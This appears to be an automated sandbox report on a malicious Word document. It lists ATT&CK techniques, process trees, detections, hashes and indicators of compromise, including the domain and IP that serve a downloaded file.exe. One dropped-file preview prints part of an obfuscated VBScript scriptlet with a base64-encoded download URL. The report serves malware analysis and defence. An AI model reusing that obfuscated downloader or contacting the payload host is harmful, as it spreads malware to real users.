Remote System Discovery		Distributed Component Object ModelInput CaptureScheduled Transfer13
Application Layer Protocol		SIM Card SwapCarrier Billing Fraud
Cloud Accounts33
Exploitation for Client Execution		Network Logon ScriptNetwork Logon Script111
Process Injection		LSA Secrets3
File and Directory Discovery		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable Media3
PowerShell		Rc.commonRc.common1
Deobfuscate/Decode Files or Information		Cached Domain Credentials114
System Information Discovery		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup Items2
Scripting		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
Obfuscated Files or Information		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 829399 Sample: TEPO0015922.doc Startdate: 18/03/2023 Architecture: WINDOWS Score: 100 60 Malicious sample detected (through community Yara rule) 2->60 62 Multi AV Scanner detection for submitted file 2->62 64 Document exploit detected (drops PE files) 2->64 66 5 other signatures 2->66 7 WINWORD.EXE 302 51 2->7         started        process3 dnsIp4 58 thekaribacruisecompany.com 149.102.154.62, 443, 49171, 49172 COGENT-174US United States 7->58 50 C:\Users\user\AppData\Local\...\file[1].exe, PE32 7->50 dropped 52 C:\Users\user\AppData\...\FZdtfhgYgeghD  .scT, data 7->52 dropped 54 C:\Users\user\AppData\Local\...\8A92D3FF.png, 370 7->54 dropped 72 Document exploit detected (creates forbidden files) 7->72 74 Microsoft Office creates scripting files 7->74 12 cmd.exe 7->12         started        15 cmd.exe 7->15         started        17 cmd.exe 7->17         started        19 5 other processes 7->19 file5 signatures6 process7 signatures8 76 Suspicious powershell command line found 12->76 78 Tries to download and execute files (via powershell) 12->78 80 Bypasses PowerShell execution policy 12->80 21 powershell.exe 12 7 12->21         started        26 powershell.exe 15->26         started        28 powershell.exe 17->28         started        82 Injects files into Windows application 19->82 30 file.exe 1 57 19->30         started        32 file.exe 35 19->32         started        34 file.exe 35 19->34         started        process9 dnsIp10 56 thekaribacruisecompany.com 21->56 36 C:\Users\user\AppData\Roaming\file.exe, PE32 21->36 dropped 68 Powershell drops PE file 21->68 38 C:\Users\user\...\libgdk_pixbuf-2.0-0.dll, PE32+ 30->38 dropped 40 C:\Users\user\AppData\...\httputility.dll, PE32+ 30->40 dropped 42 C:\Users\user\AppData\...\ZedGraph.dll, PE32 30->42 dropped 44 C:\Users\user\AppData\Local\...\System.dll, PE32 30->44 dropped 70 Tries to detect virtualization through RDTSC time measurements 30->70 46 C:\Users\user\AppData\Local\...\System.dll, PE32 32->46 dropped 48 C:\Users\user\AppData\Local\...\System.dll, PE32 34->48 dropped file11 signatures12

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
TEPO0015922.doc23%ReversingLabsScript.Trojan.Woreflint
TEPO0015922.doc42%VirustotalBrowse

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\file[1].exe6%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsnC988.tmp\System.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nss4AE7.tmp\System.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsx1ED8.tmp\System.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes\Anabiotic\Farvelgninger\Satires\ZedGraph.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes\httputility.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes\libgdk_pixbuf-2.0-0.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\file.exe6%ReversingLabs

Unpacked PE Files

SourceDetectionScannerLabelLinkDownload
9.0.file.exe.400000.0.unpack100%AviraHEUR/AGEN.1223491Download File
21.0.file.exe.400000.0.unpack100%AviraHEUR/AGEN.1223491Download File
6.2.powershell.exe.36dfce5.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
16.2.file.exe.400000.0.unpack100%AviraHEUR/AGEN.1223491Download File
21.2.file.exe.400000.0.unpack100%AviraHEUR/AGEN.1223491Download File
16.0.file.exe.400000.0.unpack100%AviraHEUR/AGEN.1223491Download File
9.2.file.exe.400000.0.unpack100%AviraHEUR/AGEN.1223491Download File

Domains

SourceDetectionScannerLabelLink
thekaribacruisecompany.com0%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
http://ocsp.entrust.net030%URL Reputationsafe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
httPs://thekaribacruisecompany.c0%Avira URL Cloudsafe
http://ocsp.entrust.net0D0%URL Reputationsafe
https://thekaribacruisecompany.com0%Avira URL Cloudsafe
httPs://thekaribacruisecompany.com/file.exePE0%Avira URL Cloudsafe
httPs://thekaribacruisecompany.com/file.exePEQ0%Avira URL Cloudsafe
httPs://thekaribacruisecompany.com/file.exe0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
thekaribacruisecompany.com
149.102.154.62
truetrueunknown

Contacted URLs

NameMaliciousAntivirus DetectionReputation
https://thekaribacruisecompany.com/file.exefalse
    		unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    httPs://thekaribacruisecompany.cpowershell.exe, 00000006.00000002.912596165.00000000035BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.926461141.00000000035AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.959457009.000000000385C000.00000004.00000800.00020000.00000000.sdmptrue
    • Avira URL Cloud: safe
    		unknown
    http://crl.pkioverheid.nl/DomOvLatestCRL.crl0powershell.exe, 00000006.00000002.919745005.000000001B37C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.919745005.000000001B391000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.911999906.000000000024F000.00000004.00000020.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown
    http://nsis.sf.net/NSIS_Errorfile.exe, file.exe, 00000010.00000000.947049391.000000000040A000.00000008.00000001.01000000.00000006.sdmp, file.exe, 00000010.00000002.1283348828.000000000040A000.00000004.00000001.01000000.00000006.sdmp, file.exe, 00000015.00000000.1014911809.000000000040A000.00000008.00000001.01000000.00000006.sdmp, file.exe, 00000015.00000002.1283424107.000000000040A000.00000004.00000001.01000000.00000006.sdmpfalse
      		high
      http://crl.entrust.net/server1.crl0powershell.exe, 00000006.00000002.919745005.000000001B39E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.911999906.000000000024F000.00000004.00000020.00020000.00000000.sdmpfalse
        		high
        http://ocsp.entrust.net03powershell.exe, 00000006.00000002.919745005.000000001B39E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.911999906.000000000024F000.00000004.00000020.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        		unknown
        httPs://thekaribacruisecompany.com/file.exePEpowershell.exe, 0000000C.00000002.926461141.00000000035AC000.00000004.00000800.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        httPs://thekaribacruisecompany.com/file.exePEQpowershell.exe, 00000006.00000002.912596165.00000000035BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.959457009.000000000385C000.00000004.00000800.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        httPs://thekaribacruisecompany.com/file.exepowershell.exe, 00000012.00000002.953185169.00000000002CF000.00000004.00000020.00020000.00000000.sdmptrue
        • Avira URL Cloud: safe
        		unknown
        http://www.piriform.com/ccleanerpowershell.exe, 0000000C.00000002.925602681.00000000001B7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.953185169.00000000002CF000.00000004.00000020.00020000.00000000.sdmpfalse
          		high
          http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0powershell.exe, 00000006.00000002.919745005.000000001B37C000.00000004.00000020.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://www.diginotar.nl/cps/pkioverheid0powershell.exe, 00000006.00000002.919745005.000000001B37C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.919745005.000000001B391000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.911999906.000000000024F000.00000004.00000020.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://thekaribacruisecompany.compowershell.exe, 00000006.00000002.912596165.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.912596165.00000000035BC000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://nsis.sf.net/NSIS_ErrorErrorfile.exe, 00000009.00000002.1283288153.000000000040A000.00000004.00000001.01000000.00000006.sdmp, file.exe, 00000009.00000000.921928467.000000000040A000.00000008.00000001.01000000.00000006.sdmp, file.exe, 00000010.00000000.947049391.000000000040A000.00000008.00000001.01000000.00000006.sdmp, file.exe, 00000010.00000002.1283348828.000000000040A000.00000004.00000001.01000000.00000006.sdmp, file.exe, 00000015.00000000.1014911809.000000000040A000.00000008.00000001.01000000.00000006.sdmp, file.exe, 00000015.00000002.1283424107.000000000040A000.00000004.00000001.01000000.00000006.sdmpfalse
            		high
            http://ocsp.entrust.net0Dpowershell.exe, 00000006.00000002.919745005.000000001B391000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://www.piriform.com/Ygpowershell.exe, 00000012.00000002.953185169.00000000002CF000.00000004.00000020.00020000.00000000.sdmpfalse
              		high
              https://secure.comodo.com/CPS0powershell.exe, 00000006.00000002.919745005.000000001B388000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.919745005.000000001B39E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.911999906.00000000002DA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.919745005.000000001B37C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.919745005.000000001B391000.00000004.00000020.00020000.00000000.sdmpfalse
                		high
                http://crl.entrust.net/2048ca.crl0powershell.exe, 00000006.00000002.919745005.000000001B391000.00000004.00000020.00020000.00000000.sdmpfalse
                  		high

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  149.102.154.62
                  		thekaribacruisecompany.comUnited States
                  		174COGENT-174UStrue

                  General Information

                  Joe Sandbox Version:37.0.0 Beryl
                  Analysis ID:829399
                  Start date and time:2023-03-18 05:34:14 +01:00
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 11m 11s
                  Hypervisor based Inspection enabled:false
                  Report type:light
                  Cookbook file name:defaultwindowsofficecookbook.jbs
                  Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                  Number of analysed new started processes analysed:25
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample file name:TEPO0015922.doc
                  Detection:MAL
                  Classification:mal100.troj.expl.evad.winDOC@29/33@2/1
                  EGA Information:
                  • Successful, ratio: 75%
                  HDC Information:
                  • Successful, ratio: 75.9% (good quality ratio 74.7%)
                  • Quality average: 87.8%
                  • Quality standard deviation: 20.7%
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 0
                  • Number of non-executed functions: 0
                  Cookbook Comments:
                  • Found application associated with file extension: .doc
                  • Found Word or Excel or PowerPoint or XPS Viewer
                  • Found warning dialog
                  • Click Ok
                  • Attach to Office via COM
                  • Active ActiveX Object
                  • Scroll down
                  • Close Viewer

                  Warnings

                  • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, svchost.exe
                  • TCP Packets have been reduced to 100
                  • Execution Graph export aborted for target powershell.exe, PID 264 because it is empty
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size getting too big, too many NtCreateFile calls found.
                  • Report size getting too big, too many NtOpenFile calls found.
                  • Report size getting too big, too many NtQueryAttributesFile calls found.

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  05:34:20API Interceptor48x Sleep call for process: powershell.exe modified
                  05:34:27API Interceptor824x Sleep call for process: file.exe modified

                  Joe Sandbox View / Context

                  IPs

                  No context

                  Domains

                  No context

                  ASNs

                  No context

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  No context

                  Created / dropped Files

                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\file[1].exe

                  Download File
                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                  Category:dropped
                  Size (bytes):676320
                  Entropy (8bit):7.876330435838718
                  Encrypted:false
                  SSDEEP:12288:8mNV/R3qdeJpAQxZg2ZE0PU4vPDC+0BOh8ybWIJQ3P0tX8glVk+4uWFG49:8mNV/RadXcvZ72PGX8g0uWA49
                  MD5:A1AFEF77EEC567ADB1076E8679AF207B
                  SHA1:842A3650C51486F329A4079CA4B62AE5542A8C98
                  SHA-256:2219616AFA29DD45A0B8926C8D840C5168F3B9E14A14F7569EA70EA8F5ACAA79
                  SHA-512:8DAFDDABA28D56F80B09545068A9A292A0D6E8C21D1D8CA0395B3AA113C467C4134A1781D62D78BA541AECF519DADA47F46D39EB59BF41B3B9366A3659027253
                  Malicious:true
                  Yara Hits:
                  • Rule: SUSP_NullSoftInst_Combo_Oct20_1, Description: Detects suspicious NullSoft Installer combination with common Copyright strings, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\file[1].exe, Author: Florian Roth (Nextron Systems)
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 6%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG.*_...PG..PF.IPG.*_...PG.sw..PG..VA..PG.Rich.PG.........PE..L.....Oa.................f....... ...3............@..................................)....@.................................D........p..H............9..@............................................................................................text....e.......f.................. ..`.rdata...............j..............@..@.data...8............~..............@....ndata...@...0...........................rsrc...H....p......................@..@................................................................................................................................................................................................................................................................................................................................................................

                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3DD35DF4.wmf

                  Download File
                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                  File Type:Windows metafile
                  Category:dropped
                  Size (bytes):3712
                  Entropy (8bit):5.038804771790638
                  Encrypted:false
                  SSDEEP:48:PZk/UKHl3G6nj6rmbYf3LSrd/lO88e0f5aSdJ9nNk3t1f8:Rk7Hgwj+mbYf3LSrhlOs0f5aSdHn63DE
                  MD5:4D808394C1EEFE8BB33A88A06C27401A
                  SHA1:E7E85FAC534EB92A90047CEAA4FBA4D0BB2FB761
                  SHA-256:588A5724964EDC5765F224738AD5AE3FE39D8F67DF7C3990013739808663A396
                  SHA-512:499AA1814D8E9E4982EBE52063786EDBCB924C587045844638F2C61FEED4900A321F8C6E166A76FBEACC5AAA4ABAA8B925523DE5EF1FDD8A7C9323B7D52D517E
                  Malicious:false
                  Preview:......@.....!.....................5...........................Segoe UI....C.......@...............-...........................A..... . ..... . ...6.(... ...@.............................................................................................................................................................................................................................................................................................?.........!...A.F.f. . ..... . ...6.(... ... ................................................................................................................................................................................................................................................................................................................................G .>..:..9..8..8..8..9..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:.i2........K..S(.O$.N!.N!.N!.N!.N".M".M".M".M".M".M".M".M".M".M".M".M".M".M".M".M".N".M".M".O$.S).O".......l

                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8A92D3FF.png

                  Download File
                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                  File Type:370 sysV pure executable
                  Category:dropped
                  Size (bytes):262160
                  Entropy (8bit):0.03833554348224308
                  Encrypted:false
                  SSDEEP:12:IyQ3fvTmeCEG+b2+f3TE/lfuNH1RCZK4vFQyfulTa5Pw1ETgobVOI7lP1g6UKK4N:7e8+S+f3CsHT8v5GIw1Ew2sEr10+
                  MD5:8844F30E839A1EFB15EF793ADF3FAADB
                  SHA1:63C9886F6646A18F84551260C802A23EA5EA59C6
                  SHA-256:353497E0866CB4835118DF6240847822FDEBBFD6F91A54385CD8C91C923927BF
                  SHA-512:3F57407F8B80C80022CBF11C023C1A42C56C2B03F57F87BF342DF19D624249E1C9DB82DC52791B3C1DAEA541884935B20615645FC2976448BE123D37D231A6D4
                  Malicious:false
                  Preview:X.:.....`.c....../......xt......HV.......d..............0.].......@@......b.......^.............................................................................@.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................C.:.\.W.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2...........................................................................................................................................................................................................................

                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{B63E613D-9211-4CF9-925B-159614833873}.tmp

                  Download File
                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                  File Type:Composite Document File V2 Document, Cannot read section info
                  Category:dropped
                  Size (bytes):72192
                  Entropy (8bit):5.409452390606404
                  Encrypted:false
                  SSDEEP:1536:jjzaoaDabaRaOa2EV1/pfw8jzaoaDabaRaOa2EV1/pb4M:jjzaoaDabaRaOa2yhpbjzaoaDabaRaOE
                  MD5:19AEC7C9E1A6F87D33460B38D45598C1
                  SHA1:29A61AFAA40A1D73C86C2C8B8F45129FB53ADD46
                  SHA-256:77AE5958D01783AD2EA852528C06B3990170E2BE2CC56C4E3B6BA6DA1F794F2A
                  SHA-512:63011FE4D636EE50FE5549F8728CC2DF6B91325B7D42D10A1B79492C3F9FA26FA11B19EECD5A4161F168ACBA5E301A50864B85056F517D252B0CC9D3228F2EF7
                  Malicious:false
                  Preview:......................>.......................................................~...........................................................................................................................................................................................................................................................................................................................................................................................................................................................<...;........................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:.......=...>...C...?...@...A...B...F...D...E...G...........I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{CDF61019-DC02-4D7F-85CF-609F74BFDBD2}.tmp

                  Download File
                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):44610
                  Entropy (8bit):2.915845583250266
                  Encrypted:false
                  SSDEEP:768:jH/3ViFs0Dqeb4Zep84JtueJvCI19rIwzWSgUg4P58F:LFia0Dqeb0nstw29rVzWSgm58F
                  MD5:DD4D5630ACAED2C14DBBFEF135337A90
                  SHA1:F9CF009C0D71D59B8E976F3CB9FF8C58DB65C777
                  SHA-256:15C024ACB0117A71C3A5FA9C0D4CB47C15B1724C868340290561E242CCAACABE
                  SHA-512:E7D91217A34A9CCE6D829903B12FB9FD49E104418488DEB83794D0779DCCF30D723E46F4DBC7FE0BA59FFFB4BBDEAB6D3AF2E46EF26112B4BAADAEEF4E74FC98
                  Malicious:false
                  Preview:c.0.5.P.l.e.a.s.e. .c.l.i.c.k. .E.n.a.b.l.e. .E.d.i.t.i.n.g. .t.o. .v.i.e.w. .t.h.e. .d.o.c.u.m.e.n.t.......=......... .P.a.c.k.a.g.e.E.M.B.E.D.W.o.r.d...D.o.c.u.m.e.n.t...8.........=....... .\.a. .W.o.r.d...D.o.c.u.m.e.n.t...8. .".%.T.M.P.%.\.\.F.Z.d.t.f.h.g.Y.g.e.g.h.D.9 ....s.c.T.". .".e.w.:.{.0.0.0.0.0.0.0.0.-.0.0.0.0.-.0.0.0.0.-.0.0.0.0.-.0.0.0.0.0.0.0.0.0.0.0.0.}.".L.I.N.K........................................................................................................................................... ...<...N...f...h...n...p...v.................................................................................................................................................................................................................................................CJ..OJ..QJ..^J..aJ.....j....OJ..QJ..U..^J..mH..sH.. .j..g...OJ..QJ..U..^J..mH..sH....OJ..QJ..^J..mH..sH.....h..N.OJ..QJ..^J.....h..N..h..N.OJ..QJ..^J.....h..N..h..N.5..OJ..QJ..^J....h..N..h..N.OJ..PJ..QJ..^J.

                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{D69C60B5-B29E-4F37-A352-937B9DD503EB}.tmp

                  Download File
                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):1024
                  Entropy (8bit):0.05390218305374581
                  Encrypted:false
                  SSDEEP:3:ol3lYdn:4Wn
                  MD5:5D4D94EE7E06BBB0AF9584119797B23A
                  SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                  SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                  SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                  Malicious:false
                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{FE1210DB-2D28-4E8A-A9AA-48F09BC90D1C}.tmp

                  Download File
                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):1536
                  Entropy (8bit):1.3552060938024997
                  Encrypted:false
                  SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlby:IiiiiiiiiifdLloZQc8++lsJe1Mzx
                  MD5:8F34D16DF01F276F2E234FC9258B3727
                  SHA1:428153094C7CD2746DD5A708F5E39AFBF8662837
                  SHA-256:10E530C54C6FE6553CBDEC0ACA8A2E3F9D9EAC12A2A77A913DAB2061D2600550
                  SHA-512:48B7984A98A666C4F5243D1B7DF2017D78C73AC20F88B14E2F7CC519C329E2E4B4EAB9FFD0C20E6CDD54FB63D724C6521312D035156BAD123260646E0C8F2B66
                  Malicious:false
                  Preview:..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Users\user\AppData\Local\Temp\FZdtfhgYgeghD .scT

                  Download File
                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):27285
                  Entropy (8bit):5.239363181413612
                  Encrypted:false
                  SSDEEP:384:fk5bxzaoaDabaRaOa2EqrRiymKviciqNEEE6oEaE3DvzLfanpob:sjzaoaDabaRaOa2EGYym1qSPW1LzOnpc
                  MD5:8BED1182F10668855D0EBF97E4D6AB19
                  SHA1:70026363421111F8B032D8BA267F1A3D6E39A9AB
                  SHA-256:DB605E4427B82B840EBEF2FBC01CAF768AB8557D823AFF39694E8C9532D8BAF2
                  SHA-512:73168037D3BF83D672511FAE9631026E73B17AD2B5E54904675C0496120FB1C16DB8D8A606A8159F718B8E58E945DEECE24A8D7F6C4B5743F7DF3BF2D8258162
                  Malicious:true
                  Preview:<scriptleT.. ><script runat="server" language = 'vbscript'>....fsdfdsfs = "aHR0UHM6Ly90aGVrYXJpYmFjcnVpc2Vjb21wYW55LmNvbS9maWxlLmV4ZQ==" 'wiiurg..yulkytjtrhtjrkdsarjky ="ZmlsZS5leGU=" 'wiiurg..Function age64Funccode(ByVal cvwtr5ycbve, ByVal trtsk484t378).. Dim xtexenc.. if trtsk484t378 Then xtexenc = "utf-16le" Else xtexenc = "utf" + "-8".. ' Use an aux. XML document with a Base64-encoded element... ' Assigning the encoded text to .Text makes the decoded byte array.. jdcuidowfubg7 = "b" + "je".. vbsxjkhwgejkdwfgkvbf = "Cr".. vbsxjkhwgejkdwfgkvbf = vbsxjkhwgejkdwfgkvbf + "eateO".. vbsxjkhwgejkdwfgkvbf = vbsxjkhwgejkdwfgkvbf + jdcuidowfubg7 + "ct".. soswjwslvc = "reate".. mosdoepfy9eqje = "Se".. vposaleusaogr = "(""Msx".. vposaleusaogr = vposaleusaogr + "ml2.".. vposaleusaogr = vposaleusaogr + "DOMDocument"")" + ".C".. mosdoepfy9eqje = mosdoepfy9eqje + "t alxmd = " + vbsxjkhwgejkdwfgkvbf + vposaleusaogr + soswjwslvc + "E".. mosdo

                  C:\Users\user\AppData\Local\Temp\FZdtfhgYgeghD .scT:Zone.Identifier

                  Download File
                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):26
                  Entropy (8bit):3.95006375643621
                  Encrypted:false
                  SSDEEP:3:gAWY3n:qY3n
                  MD5:FBCCF14D504B7B2DBCB5A5BDA75BD93B
                  SHA1:D59FC84CDD5217C6CF74785703655F78DA6B582B
                  SHA-256:EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
                  SHA-512:AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC762480482C5C2E53F803CD9E3973DDEFC68966F974E124307B5043E654443B98
                  Malicious:false
                  Preview:[ZoneTransfer]..ZoneId=3..

                  C:\Users\user\AppData\Local\Temp\nsnC988.tmp\System.dll

                  Download File
                  Process:C:\Users\user\AppData\Roaming\file.exe
                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):11776
                  Entropy (8bit):6.024446974480565
                  Encrypted:false
                  SSDEEP:192:Vm9rQDenC9VrcK7REgSWOprANupQYLRszDDH/d9CWlXo7U6Wxf:QJQEaVAK7R9SfpjpQYLRszfH/d9CWB1j
                  MD5:E23600029D1B09BDB1D422FB4E46F5A6
                  SHA1:5D64A2F6A257A98A689A3DB9A087A0FD5F180096
                  SHA-256:7342B73593B3AA1B15E3731BFB1AFD1961802A5C66343BAC9A2C737EE94F4E38
                  SHA-512:C971F513142633CE0E6EC6A04C754A286DA8016563DAB368C3FAC83AEF81FA3E9DF1003C4B63D00A46351A9D18EAA7AE7645CAEF172E5E1D6E29123AB864E7AC
                  Malicious:false
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 0%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......./@t.k!..k!..k!..9T..l!.. Y..l!..k!..x!...T..o!...T..j!...T..j!...T..j!..Richk!..........................PE..L.....c.........."!....."...................@...............................p............@..........................@.......A..P............................`.......................................................@..X............................text...+!.......".................. ..`.rdata.......@.......&..............@..@.data...D....P.......*..............@....reloc.......`.......,..............@..B........................................................................................................................................................................................................................................................................................................................................................................

                  C:\Users\user\AppData\Local\Temp\nss4AE7.tmp\System.dll

                  Download File
                  Process:C:\Users\user\AppData\Roaming\file.exe
                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):11776
                  Entropy (8bit):6.024446974480565
                  Encrypted:false
                  SSDEEP:192:Vm9rQDenC9VrcK7REgSWOprANupQYLRszDDH/d9CWlXo7U6Wxf:QJQEaVAK7R9SfpjpQYLRszfH/d9CWB1j
                  MD5:E23600029D1B09BDB1D422FB4E46F5A6
                  SHA1:5D64A2F6A257A98A689A3DB9A087A0FD5F180096
                  SHA-256:7342B73593B3AA1B15E3731BFB1AFD1961802A5C66343BAC9A2C737EE94F4E38
                  SHA-512:C971F513142633CE0E6EC6A04C754A286DA8016563DAB368C3FAC83AEF81FA3E9DF1003C4B63D00A46351A9D18EAA7AE7645CAEF172E5E1D6E29123AB864E7AC
                  Malicious:false
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 0%
